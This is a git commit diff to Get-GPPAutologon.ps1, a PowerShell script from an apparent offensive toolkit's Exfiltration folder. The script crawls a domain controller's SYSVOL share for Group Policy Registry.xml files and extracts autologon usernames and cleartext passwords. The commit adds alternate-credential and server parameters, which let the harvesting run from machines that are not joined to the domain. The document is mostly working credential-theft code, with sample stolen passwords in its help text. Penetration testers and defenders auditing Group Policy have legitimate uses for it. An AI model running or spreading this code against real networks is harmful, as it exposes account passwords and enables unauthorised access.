Update Get-GPPAutologon.ps1

Allows to use Get-GPPAutologon with alternate credentials or on a non-domain joined pc.
2019-08-20 12:04:17 +02:00 · 2019-08-20 12:04:17 +02:00 · 863056e4c3
parent c7985c9bc3
commit 863056e4c3
1 changed files with 57 additions and 24 deletions
--- a/Exfiltration/Get-GPPAutologon.ps1
+++ b/Exfiltration/Get-GPPAutologon.ps1
@ -12,9 +12,18 @@ function Get-GPPAutologon
    Required Dependencies: None
    Optional Dependencies: None

+.PARAMETER Server
+
+    Specifies an Active Directory server (domain controller) to bind to.
+    Default's to the users current domain controller.
+
+.PARAMETER Credential
+
+    A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain.
+
 .DESCRIPTION

-    Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
+    Get-GPPAutologon searches the domain controller for registry.xml to find autologon information and returns the username and password.

 .EXAMPLE

@ -38,13 +47,26 @@ function Get-GPPAutologon
    read123
    Recycling*3ftw!

+.EXAMPLE
+
+    PS C:\> Get-GPPAutologon -Server DC01.example.domain -Credential example.domain\testuser
+
 .LINK
    
    https://support.microsoft.com/nb-no/kb/324737
 #>
    
    [CmdletBinding()]
-    Param ()
+    Param (
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server = $($ENV:LOGONSERVER -replace '\\',''),
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
    
    #Some XML issues between versions
    Set-StrictMode -Version 2
@ -59,7 +81,6 @@ function Get-GPPAutologon
    
        try 
        {
-            $Filename = Split-Path $File -Leaf
            [xml] $Xml = Get-Content ($File)

            #declare empty arrays
@ -84,7 +105,6 @@ function Get-GPPAutologon
                            $Username += , $prop | Select-Object -ExpandProperty Value
                        }
                    }
-
                    Write-Verbose "Potential password in $File"
                }

@ -112,18 +132,25 @@ function Get-GPPAutologon
                }
            }
        }
-        catch {Write-Error $Error[0]}
+        catch {Write-Error $_}
    }

    try {
-        #ensure that machine is domain joined and script is running as a domain account
+        $PATH="\\$Server\SYSVOL"
+        # connect to domain controller
+        if ($PSBoundParameters['Credential']) {
+            $DRIVE = New-PSDrive -Name DC -PSProvider FileSystem -Root \\$Server\SYSVOL -Credential $Credential -Scope global
+            $PATH="DC:\*"
+            if( -not $DRIVE ){throw 'Could not connect to domain controller.'}
+        } else {
            if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
                throw 'Machine is not a domain member or User is not a member of the domain.'
            }
+        }

        #discover potential registry.xml containing autologon passwords
-        Write-Verbose 'Searching the DC. This could take a while.'
-        $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
+        Write-Host 'Searching the DC. This could take a while.'
+        $XMlFiles = Get-ChildItem -Path $PATH -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
    
        if ( -not $XMlFiles ) {throw 'No preference files found.'}

@ -133,7 +160,13 @@ function Get-GPPAutologon
            $Result = (Get-GppInnerFields $File.Fullname)
            Write-Output $Result
        }
+
+        if ($PSBoundParameters['Credential']) {
+            Remove-PSDrive DC
        }

-    catch {Write-Error $Error[0]}
+        Write-Host "Done."
+    }
+
+    catch {Write-Error $_}
 }